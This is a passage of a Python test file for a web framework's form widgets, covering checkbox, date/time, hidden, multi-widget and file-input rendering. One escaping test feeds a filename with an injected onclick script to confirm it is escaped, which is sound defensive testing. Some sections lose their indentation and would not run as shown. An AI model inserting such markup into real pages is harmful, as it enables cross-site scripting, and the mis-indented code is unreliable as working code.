        self.assertHTMLEqual(w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
        self.assertHTMLEqual(w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
        self.assertHTMLEqual(w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
        # The 'choices' argument can be any iterable:
        def get_choices():
            for i in range(5):
                yield (i, i)
        self.assertHTMLEqual(w.render('nums', [2], choices=get_choices()), """<ul>
<li><label><input type="checkbox" name="nums" value="0" /> 0</label></li>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
</ul>""")
        # You can also pass 'choices' to the constructor:
        w = CheckboxSelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
        self.assertHTMLEqual(w.render('nums', [2]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>""")
        # If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
        self.assertHTMLEqual(w.render('nums', [2], choices=[(4, 4), (5, 5)]), """<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
<li><label><input type="checkbox" name="nums" value="5" /> 5</label></li>
</ul>""")
        # Choices are escaped correctly
        self.assertHTMLEqual(w.render('escape', None, choices=(('bad', 'you & me'), ('good', mark_safe('you &gt; me')))), """<ul>
<li><label><input type="checkbox" name="escape" value="1" /> 1</label></li>
<li><label><input type="checkbox" name="escape" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="escape" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="escape" value="bad" /> you &amp; me</label></li>
<li><label><input type="checkbox" name="escape" value="good" /> you &gt; me</label></li>
</ul>""")
        # Unicode choices are correctly rendered as HTML
        self.assertHTMLEqual(w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]), '<ul>\n<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>\n<li><label><input type="checkbox" name="nums" value="2" /> 2</label></li>\n<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>\n<li><label><input checked="checked" type="checkbox" name="nums" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="checkbox" name="nums" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>')
        # Each input gets a separate ID
        self.assertHTMLEqual(CheckboxSelectMultiple().render('letters', list('ac'), choices=zip(list('abc'), list('ABC')), attrs={'id': 'abc'}), """<ul id="abc">
<li><label for="abc_0"><input checked="checked" type="checkbox" name="letters" value="a" id="abc_0" /> A</label></li>
<li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1" /> B</label></li>
<li><label for="abc_2"><input checked="checked" type="checkbox" name="letters" value="c" id="abc_2" /> C</label></li>
</ul>""")
        # Each input gets a separate ID when the ID is passed to the constructor
        self.assertHTMLEqual(CheckboxSelectMultiple(attrs={'id': 'abc'}).render('letters', list('ac'), choices=zip(list('abc'), list('ABC'))), """<ul id="abc">
<li><label for="abc_0"><input checked="checked" type="checkbox" name="letters" value="a" id="abc_0" /> A</label></li>
<li><label for="abc_1"><input type="checkbox" name="letters" value="b" id="abc_1" /> B</label></li>
<li><label for="abc_2"><input checked="checked" type="checkbox" name="letters" value="c" id="abc_2" /> C</label></li>
</ul>""")
        w = CheckboxSelectMultiple()
        r = w.get_renderer('abc', 'b', choices=[(c, c.upper()) for c in 'abc'])
        # You can iterate over the CheckboxFieldRenderer to get individual elements
        expected = [
            '<label><input type="checkbox" name="abc" value="a" /> A</label>',
            '<label><input checked="checked" type="checkbox" name="abc" value="b" /> B</label>',
            '<label><input type="checkbox" name="abc" value="c" /> C</label>',
        ]
        for output, expected in zip(r, expected):
            self.assertHTMLEqual(force_text(output), expected)
        # You can access individual elements
        self.assertHTMLEqual(force_text(r[1]),
            '<label><input checked="checked" type="checkbox" name="abc" value="b" /> B</label>')
        # Out-of-range errors are propagated
        with self.assertRaises(IndexError):
            r[42]
    def test_subwidget(self):
        """subwidgets() yields one subwidget per choice; each subwidget's
        tag() carries an indexed id only when the parent widget has an 'id'
        attr, and id_for_label matches the id used on the tag."""
        # Each subwidget tag gets a separate ID when the widget has an ID specified
        self.assertHTMLEqual("\n".join(c.tag() for c in CheckboxSelectMultiple(attrs={'id': 'abc'}).subwidgets('letters', list('ac'), choices=zip(list('abc'), list('ABC')))), """<input checked="checked" type="checkbox" name="letters" value="a" id="abc_0" />
<input type="checkbox" name="letters" value="b" id="abc_1" />
<input checked="checked" type="checkbox" name="letters" value="c" id="abc_2" />""")
        # Each subwidget tag does not get an ID if the widget does not have an ID specified
        self.assertHTMLEqual("\n".join(c.tag() for c in CheckboxSelectMultiple().subwidgets('letters', list('ac'), choices=zip(list('abc'), list('ABC')))), """<input checked="checked" type="checkbox" name="letters" value="a" />
<input type="checkbox" name="letters" value="b" />
<input checked="checked" type="checkbox" name="letters" value="c" />""")
        # The id_for_label property of the subwidget should return the ID that is used on the subwidget's tag
        self.assertHTMLEqual("\n".join('<input type="checkbox" name="letters" value="%s" id="%s" />' % (c.choice_value, c.id_for_label) for c in CheckboxSelectMultiple(attrs={'id': 'abc'}).subwidgets('letters', [], choices=zip(list('abc'), list('ABC')))), """<input type="checkbox" name="letters" value="a" id="abc_0" />
<input type="checkbox" name="letters" value="b" id="abc_1" />
<input type="checkbox" name="letters" value="c" id="abc_2" />""")
def test_multi(self):
class MyMultiWidget(MultiWidget):
def decompress(self, value):
if value:
return value.split('__')
return ['', '']
def format_output(self, rendered_widgets):
return '<br />'.join(rendered_widgets)
w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})))
self.assertHTMLEqual(w.render('name', ['john', 'lennon']), '<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />')
self.assertHTMLEqual(w.render('name', 'john__lennon'), '<input type="text" class="big" value="john" name="name_0" /><br /><input type="text" class="small" value="lennon" name="name_1" />')
self.assertHTMLEqual(w.render('name', 'john__lennon', attrs={'id': 'foo'}), '<input id="foo_0" type="text" class="big" value="john" name="name_0" /><br /><input id="foo_1" type="text" class="small" value="lennon" name="name_1" />')
w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})), attrs={'id': 'bar'})
self.assertHTMLEqual(w.render('name', ['john', 'lennon']), '<input id="bar_0" type="text" class="big" value="john" name="name_0" /><br /><input id="bar_1" type="text" class="small" value="lennon" name="name_1" />')
# Test needs_multipart_form=True if any widget needs it
w = MyMultiWidget(widgets=(TextInput(), FileInput()))
self.assertTrue(w.needs_multipart_form)
# Test needs_multipart_form=False if no widget needs it
w = MyMultiWidget(widgets=(TextInput(), TextInput()))
self.assertFalse(w.needs_multipart_form)
def test_splitdatetime(self):
    """SplitDateTimeWidget renders separate date and time text inputs."""
    w = SplitDateTimeWidget()
    # Empty and None values render two empty inputs.
    self.assertHTMLEqual(w.render('date', ''), '<input type="text" name="date_0" /><input type="text" name="date_1" />')
    self.assertHTMLEqual(w.render('date', None), '<input type="text" name="date_0" /><input type="text" name="date_1" />')
    # A datetime is decompressed into its date and time parts.
    self.assertHTMLEqual(w.render('date', datetime.datetime(2006, 1, 10, 7, 30)), '<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />')
    # A [date, time] pair is used as-is, one value per sub-widget.
    self.assertHTMLEqual(w.render('date', [datetime.date(2006, 1, 10), datetime.time(7, 30)]), '<input type="text" name="date_0" value="2006-01-10" /><input type="text" name="date_1" value="07:30:00" />')
    # You can also pass 'attrs' to the constructor. In this case, the attrs will be
    # applied to both of the rendered sub-widgets.
    w = SplitDateTimeWidget(attrs={'class': 'pretty'})
    self.assertHTMLEqual(w.render('date', datetime.datetime(2006, 1, 10, 7, 30)), '<input type="text" class="pretty" value="2006-01-10" name="date_0" /><input type="text" class="pretty" value="07:30:00" name="date_1" />')
    # Use 'date_format' and 'time_format' to change the way a value is displayed.
    w = SplitDateTimeWidget(date_format='%d/%m/%Y', time_format='%H:%M')
    self.assertHTMLEqual(w.render('date', datetime.datetime(2006, 1, 10, 7, 30)), '<input type="text" name="date_0" value="10/01/2006" /><input type="text" name="date_1" value="07:30" />')
def test_datetimeinput(self):
    """DateTimeInput renders a text input; 'format' controls the display."""
    w = DateTimeInput()
    self.assertHTMLEqual(w.render('date', None), '<input type="text" name="date" />')
    d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
    self.assertEqual(str(d), '2007-09-17 12:51:34.482548')
    # The microseconds are trimmed on display, by default.
    self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="2007-09-17 12:51:34" />')
    self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51, 34)), '<input type="text" name="date" value="2007-09-17 12:51:34" />')
    self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51)), '<input type="text" name="date" value="2007-09-17 12:51:00" />')
    # Use 'format' to change the way a value is displayed.
    w = DateTimeInput(format='%d/%m/%Y %H:%M', attrs={'type': 'datetime'})
    self.assertHTMLEqual(w.render('date', d), '<input type="datetime" name="date" value="17/09/2007 12:51" />')
def test_dateinput(self):
    """DateInput renders a text input; 'format' controls the display."""
    w = DateInput()
    self.assertHTMLEqual(w.render('date', None), '<input type="text" name="date" />')
    d = datetime.date(2007, 9, 17)
    self.assertEqual(str(d), '2007-09-17')
    self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="2007-09-17" />')
    self.assertHTMLEqual(w.render('date', datetime.date(2007, 9, 17)), '<input type="text" name="date" value="2007-09-17" />')
    # We should be able to initialize from a unicode value.
    self.assertHTMLEqual(w.render('date', '2007-09-17'), '<input type="text" name="date" value="2007-09-17" />')
    # Use 'format' to change the way a value is displayed.
    w = DateInput(format='%d/%m/%Y', attrs={'type': 'date'})
    self.assertHTMLEqual(w.render('date', d), '<input type="date" name="date" value="17/09/2007" />')
def test_timeinput(self):
    """TimeInput renders a text input; 'format' controls the display."""
    w = TimeInput()
    self.assertHTMLEqual(w.render('time', None), '<input type="text" name="time" />')
    t = datetime.time(12, 51, 34, 482548)
    self.assertEqual(str(t), '12:51:34.482548')
    # The microseconds are trimmed on display, by default.
    self.assertHTMLEqual(w.render('time', t), '<input type="text" name="time" value="12:51:34" />')
    self.assertHTMLEqual(w.render('time', datetime.time(12, 51, 34)), '<input type="text" name="time" value="12:51:34" />')
    self.assertHTMLEqual(w.render('time', datetime.time(12, 51)), '<input type="text" name="time" value="12:51:00" />')
    # We should be able to initialize from a unicode value.
    self.assertHTMLEqual(w.render('time', '13:12:11'), '<input type="text" name="time" value="13:12:11" />')
    # Use 'format' to change the way a value is displayed.
    w = TimeInput(format='%H:%M', attrs={'type': 'time'})
    self.assertHTMLEqual(w.render('time', t), '<input type="time" name="time" value="12:51" />')
def test_splithiddendatetime(self):
    """SplitHiddenDateTimeWidget renders hidden date and time inputs."""
    from django.forms.widgets import SplitHiddenDateTimeWidget
    w = SplitHiddenDateTimeWidget()
    self.assertHTMLEqual(w.render('date', ''), '<input type="hidden" name="date_0" /><input type="hidden" name="date_1" />')
    d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
    # Plain string comparison, not HTML: use assertEqual here, consistent
    # with the sibling tests (test_datetimeinput, test_dateinput, ...).
    self.assertEqual(str(d), '2007-09-17 12:51:34.482548')
    # The microseconds are trimmed on display, by default.
    self.assertHTMLEqual(w.render('date', d), '<input type="hidden" name="date_0" value="2007-09-17" /><input type="hidden" name="date_1" value="12:51:34" />')
    self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51, 34)), '<input type="hidden" name="date_0" value="2007-09-17" /><input type="hidden" name="date_1" value="12:51:34" />')
    self.assertHTMLEqual(w.render('date', datetime.datetime(2007, 9, 17, 12, 51)), '<input type="hidden" name="date_0" value="2007-09-17" /><input type="hidden" name="date_1" value="12:51:00" />')
def test_multiwidget(self):
    # MultiWidgets are widgets composed of other widgets. They are usually
    # combined with MultiValueFields - a field that is composed of other fields.
    # MultiWidgets can themselves be composed of other MultiWidgets.
    # SplitDateTimeWidget is one example of a MultiWidget.
    class ComplexMultiWidget(MultiWidget):
        def __init__(self, attrs=None):
            widgets = (
                TextInput(),
                SelectMultiple(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
                SplitDateTimeWidget(),
            )
            super(ComplexMultiWidget, self).__init__(widgets, attrs)
        def decompress(self, value):
            # "text,choicechars,datetime" -> [text, [char, ...], datetime]
            if value:
                data = value.split(',')
                return [data[0], list(data[1]), datetime.datetime.strptime(data[2], "%Y-%m-%d %H:%M:%S")]
            return [None, None, None]
        def format_output(self, rendered_widgets):
            return '\n'.join(rendered_widgets)
    w = ComplexMultiWidget()
    self.assertHTMLEqual(
        w.render('name', 'some text,JP,2007-04-25 06:24:00'),
        """
        <input type="text" name="name_0" value="some text" />
        <select multiple="multiple" name="name_1">
        <option value="J" selected="selected">John</option>
        <option value="P" selected="selected">Paul</option>
        <option value="G">George</option>
        <option value="R">Ringo</option>
        </select>
        <input type="text" name="name_2_0" value="2007-04-25" />
        <input type="text" name="name_2_1" value="06:24:00" />
        """,
    )
    class ComplexField(MultiValueField):
        def __init__(self, required=True, widget=None, label=None, initial=None):
            fields = (
                CharField(),
                MultipleChoiceField(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
                SplitDateTimeField()
            )
            super(ComplexField, self).__init__(fields, required, widget, label, initial)
        def compress(self, data_list):
            # Join the cleaned sub-values back into one comma-separated string.
            if data_list:
                return '%s,%s,%s' % (data_list[0], ''.join(data_list[1]), data_list[2])
            return None
    f = ComplexField(widget=w)
    self.assertEqual(
        f.clean(['some text', ['J', 'P'], ['2007-04-25', '6:24:00']]),
        'some text,JP,2007-04-25 06:24:00',
    )
    with self.assertRaisesMessage(ValidationError,
            "'Select a valid choice. X is not one of the available choices.'"):
        f.clean(['some text', ['X'], ['2007-04-25', '6:24:00']])
    # If insufficient data is provided, None is substituted
    self.assertRaisesMessage(ValidationError, "'This field is required.'", f.clean, ['some text', ['JP']])
    # test with no initial data
    self.assertTrue(f.has_changed(None, ['some text', ['J', 'P'], ['2007-04-25', '6:24:00']]))
    # test when the data is the same as initial
    self.assertFalse(f.has_changed('some text,JP,2007-04-25 06:24:00',
        ['some text', ['J', 'P'], ['2007-04-25', '6:24:00']]))
    # test when the first widget's data has changed
    self.assertTrue(f.has_changed('some text,JP,2007-04-25 06:24:00',
        ['other text', ['J', 'P'], ['2007-04-25', '6:24:00']]))
    # test when the last widget's data has changed. this ensures that it is not
    # short circuiting while testing the widgets.
    self.assertTrue(f.has_changed('some text,JP,2007-04-25 06:24:00',
        ['some text', ['J', 'P'], ['2009-04-25', '11:44:00']]))
    class ComplexFieldForm(Form):
        field1 = ComplexField(widget=w)
    f = ComplexFieldForm()
    self.assertHTMLEqual(
        f.as_table(),
        """
        <tr><th><label for="id_field1_0">Field1:</label></th>
        <td><input type="text" name="field1_0" id="id_field1_0" />
        <select multiple="multiple" name="field1_1" id="id_field1_1">
        <option value="J">John</option>
        <option value="P">Paul</option>
        <option value="G">George</option>
        <option value="R">Ringo</option>
        </select>
        <input type="text" name="field1_2_0" id="id_field1_2_0" />
        <input type="text" name="field1_2_1" id="id_field1_2_1" /></td></tr>
        """,
    )
    f = ComplexFieldForm({
        'field1_0': 'some text',
        'field1_1': ['J', 'P'],
        'field1_2_0': '2007-04-25',
        'field1_2_1': '06:24:00',
    })
    self.assertHTMLEqual(
        f.as_table(),
        """
        <tr><th><label for="id_field1_0">Field1:</label></th>
        <td><input type="text" name="field1_0" value="some text" id="id_field1_0" />
        <select multiple="multiple" name="field1_1" id="id_field1_1">
        <option value="J" selected="selected">John</option>
        <option value="P" selected="selected">Paul</option>
        <option value="G">George</option>
        <option value="R">Ringo</option>
        </select>
        <input type="text" name="field1_2_0" value="2007-04-25" id="id_field1_2_0" />
        <input type="text" name="field1_2_1" value="06:24:00" id="id_field1_2_1" /></td></tr>
        """,
    )
    self.assertEqual(f.cleaned_data['field1'], 'some text,JP,2007-04-25 06:24:00')
def test_sub_widget_html_safe(self):
    """A widget's sub-widgets are HTML-safe: __html__ matches their text form."""
    first_subwidget = next(TextInput().subwidgets('username', 'John Doe'))
    self.assertTrue(hasattr(first_subwidget, '__html__'))
    self.assertEqual(force_text(first_subwidget), first_subwidget.__html__())
def test_choice_input_html_safe(self):
    """ChoiceInput is HTML-safe: __html__ matches its rendered text form."""
    choice_widget = ChoiceInput('choices', 'CHOICE1', {}, ('CHOICE1', 'first choice'), 0)
    self.assertTrue(hasattr(ChoiceInput, '__html__'))
    self.assertEqual(force_text(choice_widget), choice_widget.__html__())
def test_choice_field_renderer_html_safe(self):
    """ChoiceFieldRenderer is HTML-safe: __html__ matches its rendered text."""
    field_renderer = ChoiceFieldRenderer('choices', 'CHOICE1', {}, [('CHOICE1', 'first_choice')])
    # Stub out the per-choice widget class; rendering details are irrelevant here.
    field_renderer.choice_input_class = lambda *args: args
    self.assertTrue(hasattr(ChoiceFieldRenderer, '__html__'))
    self.assertEqual(force_text(field_renderer), field_renderer.__html__())
class NullBooleanSelectLazyForm(Form):
    """Form to test for lazy evaluation. Refs #17190"""
    # NOTE: the field name deliberately shadows the builtin 'bool' in this
    # test-only form; used by FormsI18NWidgetsTests.test_nullbooleanselect.
    bool = BooleanField(widget=NullBooleanSelect())
@override_settings(USE_L10N=True)
class FormsI18NWidgetsTests(SimpleTestCase):
    """Widget rendering with localization active (German/Austrian locale)."""
    def setUp(self):
        super(FormsI18NWidgetsTests, self).setUp()
        # All tests in this class run under the 'de-at' locale.
        translation.activate('de-at')
    def tearDown(self):
        translation.deactivate()
        super(FormsI18NWidgetsTests, self).tearDown()
    def test_datetimeinput(self):
        """DateTimeInput uses the active locale's datetime format."""
        w = DateTimeInput()
        d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
        self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="17.09.2007 12:51:34" />')
    def test_dateinput(self):
        """DateInput uses the active locale's date format."""
        w = DateInput()
        d = datetime.date(2007, 9, 17)
        self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="17.09.2007" />')
    def test_timeinput(self):
        """TimeInput uses the active locale's time format."""
        w = TimeInput()
        t = datetime.time(12, 51, 34, 482548)
        self.assertHTMLEqual(w.render('time', t), '<input type="text" name="time" value="12:51:34" />')
    def test_datetime_locale_aware(self):
        """With USE_L10N off, formatting follows the translation override."""
        w = DateTimeInput()
        d = datetime.datetime(2007, 9, 17, 12, 51, 34, 482548)
        with self.settings(USE_L10N=False):
            self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="2007-09-17 12:51:34" />')
            with translation.override('es'):
                self.assertHTMLEqual(w.render('date', d), '<input type="text" name="date" value="17/09/2007 12:51:34" />')
    def test_splithiddendatetime(self):
        """SplitHiddenDateTimeWidget localizes its date sub-widget's value."""
        from django.forms.widgets import SplitHiddenDateTimeWidget
        w = SplitHiddenDateTimeWidget()
        self.assertHTMLEqual(
            w.render('date', datetime.datetime(2007, 9, 17, 12, 51)),
            """
            <input type="hidden" name="date_0" value="17.09.2007" />
            <input type="hidden" name="date_1" value="12:51:00" />
            """,
        )
    def test_nullbooleanselect(self):
        """
        Ensure that the NullBooleanSelect widget's options are lazily
        localized.
        Refs #17190
        """
        f = NullBooleanSelectLazyForm()
        self.assertHTMLEqual(
            f.fields['bool'].widget.render('id_bool', True),
            """
            <select name="id_bool">
            <option value="1">Unbekannt</option>
            <option value="2" selected="selected">Ja</option>
            <option value="3">Nein</option>
            </select>
            """,
        )
class SelectAndTextWidget(MultiWidget):
    """
    MultiWidget subclass combining a RadioSelect and a TextInput, which
    forwards its ``choices`` property to the inner select widget.
    """
    def __init__(self, choices=()):
        # An immutable default: the previous default of [] was a mutable
        # default argument, shared between every instance constructed
        # without an explicit 'choices' value.
        widgets = [
            RadioSelect(choices=choices),
            TextInput
        ]
        super(SelectAndTextWidget, self).__init__(widgets)
    def _set_choices(self, choices):
        """
        When choices are set for this widget, we want to pass those along to the Select widget
        """
        self.widgets[0].choices = choices
    def _get_choices(self):
        """
        The choices for this widget are the Select widget's choices
        """
        return self.widgets[0].choices
    choices = property(_get_choices, _set_choices)
class WidgetTests(SimpleTestCase):
    def test_12048(self):
        # Regression test for ticket #12048: deep-copying a MultiWidget
        # must also copy its sub-widgets, so copies stay independent.
        original = SelectAndTextWidget(choices=[1, 2, 3])
        duplicate = copy.deepcopy(original)
        duplicate.choices = [4, 5, 6]
        # Mutating the copy's choices must not leak back into the original,
        # since MultiWidget ought to copy its sub-widgets when copied.
        self.assertEqual(original.choices, [1, 2, 3])
@override_settings(ROOT_URLCONF='forms_tests.urls')
class LiveWidgetTests(AdminSeleniumWebDriverTestCase):
    """Browser-driven (Selenium) widget tests."""
    available_apps = ['forms_tests'] + AdminSeleniumWebDriverTestCase.available_apps
    def test_textarea_trailing_newlines(self):
        """
        Test that a roundtrip on a ModelForm doesn't alter the TextField value
        """
        article = Article.objects.create(content="\nTst\n")
        # Load the article's edit form and submit it unchanged.
        self.selenium.get('%s%s' % (self.live_server_url,
            reverse('article_form', args=[article.pk])))
        self.selenium.find_element_by_id('submit').submit()
        article = Article.objects.get(pk=article.pk)
        # Should be "\nTst\n" after #19251 is fixed
        self.assertEqual(article.content, "\r\nTst\r\n")
@python_2_unicode_compatible
class FakeFieldFile(object):
    """
    Quacks like a FieldFile (has a .url and unicode representation), but
    doesn't require us to care about storages etc.
    """
    # Fixed URL exposed to ClearableFileInput rendering in the tests below.
    url = 'something'
    def __str__(self):
        return self.url
class ClearableFileInputTests(SimpleTestCase):
    """Rendering, escaping and data-extraction tests for ClearableFileInput."""
    def test_clear_input_renders(self):
        """
        A ClearableFileInput with is_required False and rendered with
        an initial value that is a file renders a clear checkbox.
        """
        widget = ClearableFileInput()
        widget.is_required = False
        self.assertHTMLEqual(
            widget.render('myfile', FakeFieldFile()),
            """
            Currently: <a href="something">something</a>
            <input type="checkbox" name="myfile-clear" id="myfile-clear_id" />
            <label for="myfile-clear_id">Clear</label><br />
            Change: <input type="file" name="myfile" />
            """,
        )
    def test_html_escaped(self):
        """
        A ClearableFileInput should escape name, filename and URL when
        rendering HTML. Refs #15182.
        """
        @python_2_unicode_compatible
        class StrangeFieldFile(object):
            url = "something?chapter=1&sect=2&copy=3&lang=en"
            def __str__(self):
                return '''something<div onclick="alert('oops')">.jpg'''
        widget = ClearableFileInput()
        field = StrangeFieldFile()
        output = widget.render('my<div>file', field)
        # The raw URL must not appear; its ampersands must be escaped.
        self.assertNotIn(field.url, output)
        self.assertIn('href="something?chapter=1&amp;sect=2&amp;copy=3&amp;lang=en"', output)
        # The raw filename must not appear; its markup must be escaped.
        self.assertNotIn(six.text_type(field), output)
        self.assertIn('something&lt;div onclick=&quot;alert(&#39;oops&#39;)&quot;&gt;.jpg', output)
        # The widget name must be escaped as well.
        self.assertIn('my&lt;div&gt;file', output)
        self.assertNotIn('my<div>file', output)
    def test_html_does_not_mask_exceptions(self):
        """
        A ClearableFileInput should not mask exceptions produced while
        checking that it has a value.
        """
        @python_2_unicode_compatible
        class FailingURLFieldFile(object):
            @property
            def url(self):
                raise RuntimeError('Canary')
            def __str__(self):
                return 'value'
        widget = ClearableFileInput()
        field = FailingURLFieldFile()
        with self.assertRaisesMessage(RuntimeError, 'Canary'):
            widget.render('myfile', field)
    def test_clear_input_renders_only_if_not_required(self):
        """
        A ClearableFileInput with is_required=True does not render a clear
        checkbox.
        """
        widget = ClearableFileInput()
        widget.is_required = True
        self.assertHTMLEqual(
            widget.render('myfile', FakeFieldFile()),
            """
            Currently: <a href="something">something</a> <br />
            Change: <input type="file" name="myfile" />
            """,
        )
    def test_clear_input_renders_only_if_initial(self):
        """
        A ClearableFileInput instantiated with no initial value does not render
        a clear checkbox.
        """
        widget = ClearableFileInput()
        widget.is_required = False
        self.assertHTMLEqual(widget.render('myfile', None),
            '<input type="file" name="myfile" />')
    def test_clear_input_checked_returns_false(self):
        """
        ClearableFileInput.value_from_datadict returns False if the clear
        checkbox is checked, if not required.
        """
        widget = ClearableFileInput()
        widget.is_required = False
        self.assertEqual(widget.value_from_datadict(
            data={'myfile-clear': True},
            files={},
            name='myfile'), False)
    def test_clear_input_checked_returns_false_only_if_not_required(self):
        """
        ClearableFileInput.value_from_datadict never returns False if the field
        is required.
        """
        widget = ClearableFileInput()
        widget.is_required = True
        f = SimpleUploadedFile('something.txt', b'content')
        self.assertEqual(widget.value_from_datadict(
            data={'myfile-clear': True},
            files={'myfile': f},
            name='myfile'), f)
    def test_render_custom_template(self):
        """A custom template_with_initial is honored when rendering."""
        widget = ClearableFileInput()
        widget.template_with_initial = (
            '%(initial_text)s: <img src="%(initial_url)s" alt="%(initial)s" /> '
            '%(clear_template)s<br />%(input_text)s: %(input)s'
        )
        self.assertHTMLEqual(
            widget.render('myfile', FakeFieldFile()),
            'Currently: <img src="something" alt="something" /> '
            '<input type="checkbox" name="myfile-clear" id="myfile-clear_id" /> '
            '<label for="myfile-clear_id">Clear</label><br />Change: <input type="file" name="myfile" />'
        )
class GetDate(Form):
    # Minimal form used by the SelectDateWidget tests below.
    mydate = DateField(widget=SelectDateWidget)
class SelectDateWidgetTests(SimpleTestCase):
# The forms library comes with some extra, higher-level Field and Widget
def test_selectdate(self):
self.maxDiff = None
w = SelectDateWidget(years=('2007', '2008', '2009', '2010', '2011', '2012', '2013', '2014', '2015', '2016'))
# Rendering the default state.
self.assertHTMLEqual(
w.render('mydate', ''),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year" id="id_mydate_year">
<option value="0">---</option>
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
""",
)
# Rendering the None or '' values should yield the same output.
self.assertHTMLEqual(w.render('mydate', None), w.render('mydate', ''))
# Rendering a string value.
self.assertHTMLEqual(
w.render('mydate', '2010-04-15'),
"""
<select name="mydate_month" id="id_mydate_month">
<option value="0">---</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4" selected="selected">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day" id="id_mydate_day">
<option value="0">---</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15" selected="selected">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
